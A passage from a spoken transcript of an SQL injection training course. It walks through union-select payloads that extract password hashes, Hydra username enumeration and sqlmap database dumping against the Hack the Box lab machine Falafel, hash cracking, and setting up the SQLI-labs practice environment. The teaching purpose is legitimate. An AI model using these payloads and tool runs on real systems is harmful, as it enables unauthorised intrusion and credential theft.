underscore. And if we did that again for a limit of 2,1, we'd get underscore username underscore. So let's now extract them. A at b.com, union select, do 1, underscore password underscore 3, and we'll concat to concatenate underscore username underscore at b.c, from operators, limit 0,1. So that's A at b.com, quotes, union select 1, underscore password underscore 3, concat underscore username underscore, quote at b.c, end bracket, from operators, limit 0.1. And we get test1 and a hash. And we can repeat that with a changing limit to get all the usernames out. And we find when we do that, we eventually get to A at b.com, union select 1, underscore password underscore, 3, concat underscore username underscore, at b.c, from operators, limit 200,1. And we find that gives us our Super CMS admin user hash. If we take that hash and go into CrackStation, paste it, and we have the password tomorrow. We can now log into the system. Super underscore CMS underscore Adam and tomorrow. We've successfully carried out the SQL injection to gain access to the administrator's password. Let's try another of the Hack the Box targets. This one is called Falafel on 10.10.10.73, and it's a falafel lover's website. There's a login page, so let's try that. And let's try admin, and we get wrong identification. Let's try guessed, guessed. And we get try again. After some experimentation, it seems that our guesses for username all get the try again message, except for admin. We can now assume admin is a valid user. We don't have any passwords currently, but let's see if we can find any additional users. We can use Hydra for this. I checked the form to see that the two form fields are username and password. We'll use Hydra with pass123 as the password. We're not trying to get a valid password, just identify users. -p pass123, just a fixed password, but we'll use the list file user share word lists u.text. We're going to go to 10.10.10.73. It's going to be an HTTP post form, and it's /login.php : username equals caret user for the user from the file, and password equals rfixed caret pass. And what we're looking for as a failure message is try again. Okay, we've quickly found that Chris is a valid username. We could now try Hydra with Chris and try and crack its password, but in fact when we do that we don't find it. So let's leave it and see what we can do with an SQL injection. Let's start Burp Suite. Let's turn off interception. And we'll add to our scope 10.10.10.73. Okay. Okay, we'll set our browser preferences, network settings to manual proxy. Okay. And now let's put in the username Chris and submit. And we get wrong identification. Let's go to the post message. The username is Chris. And let's copy it to file. And we'll make the file chris.txt. Now we can run our SQL map command using the request packet and the value wrong identification, which indicates a valid response on username. SQL map -r chris.txt --string wrong identification. Okay, we found an injection. We can now run this with the --dbs switch to get the databases. --dbs. And we can see we're retrieving the database names with a blind-based timing transaction. Okay, we've recovered two tables, falafel and information schema. Let's look at the tables in falafel. D falafel -tables. And we find the users table. Okay, let's dump it. -t users and dump. Okay, we found admin and Chris together with their hashes. And when we use CrackStation, we find Chris's password is juggling. And as a postscript, our initial Hydra scan also found a username Sleepy. And when we use Sleepy, a hacking attempt is detected. I guess this was the honeypot account. Before we finish the course, you may want to set up your own SQL injection lab to deep dive more advanced SQL injections. There's an interesting set of PHP files which can be used to practice SQL injections, known as the SQLI labs. These have been created by a user called Audi1, and while the presentation is a bit juvenile, they can be quite useful as a testbed. We'll need to install the latest PHP 7 version of the labs, which we can get from the Sky Blue site shown here. Okay, let's install the files. I'm in my var www.html folder, and I'll sudo git clone https github.com sky blue SQLI labs PHP 7 .git. And I'll change the folder name to SQLI for ease of use. Sudo move SQLI labs PHP 7 to SQLI. We can now start Apache and MySQL. Service Apache 2 start and service MySQL start. We need to set up a user account for the lab. Let's do that. Sudo MySQL -u root. And we'll create user SQLI user at localhost identified by SQLI user. And we'll grant all privileges on star.star to SQLI user at localhost. Okay, we can now update the SQLI lab connection. cd SQLI, and we need to go into SQL-connections and sudo nano dbcreds.inc. Change our DB user to SQLI user and the DB password to SQLI user. Okay, we can now go into the website 127.0.0.1/SQLI, and we can reset the database for the labs. Okay, that's set up. There are over 60 exercises in total across 4 pages of basic, advanced, stacked, and challenges. And if we scroll down, we'll see the different types of exercises that we can run. Let's start the first exercise, which is to input the ID as parameter with a numeric value. And we'll do that as ID equals 1. And we get the user details for ID 1. We can do the same thing with ID 2. We get another set of details. And we can put in ID equals 3, and we get some more details. Let's go back now to lesson 2. We've got the same lesson, but let's add a quote to see what happens. Quote ID equals 1. And we have an error in the SQL syntax. Okay, let's add an inject. So we'll make that equals 1 or 1 equals 1. And that works. So now let's try equals 1 order by 1. And that works. order by 2, and that works. An order by 3, and that works. When we try order by 4, we have an unknown column. So we now know that we have 3 columns in the selection. So let's start to extract information. We'll set ID equals 0 and do a union select, and we'll select null, user, and database. And we've started to extract information. This lab provides the basis of a useful tool for trying out your SQL injections. I'd really like to thank you for joining me for this course. I hope you enjoyed learning about how to run SQL injections. This course is an important step along your learning path, which leads to becoming a professional pen tester. Web is a major attack surface, and SQL injections are one of the key web attacks used by cybercriminals and nation-state attackers. There's always something new in cybersecurity, and if you're interested in learning more, then check out the full security segment of the library, where new courses are added regularly. You'll find courses on all aspects of security. I'd also invite you to go to my author page, where you can find some additional pen testing courses, as well as a wider coverage of cybersecurity. If you want to get hands-on with Android, then do take a look at mobile devices and platforms and securing Android apps. If you're wanting to learn about security for the cloud, then cybersecurity for cloud computing is for you. You'll also find courses on the security aspects of wireless, websites, and the Internet of Things. Thanks again for joining me on this course, and I hope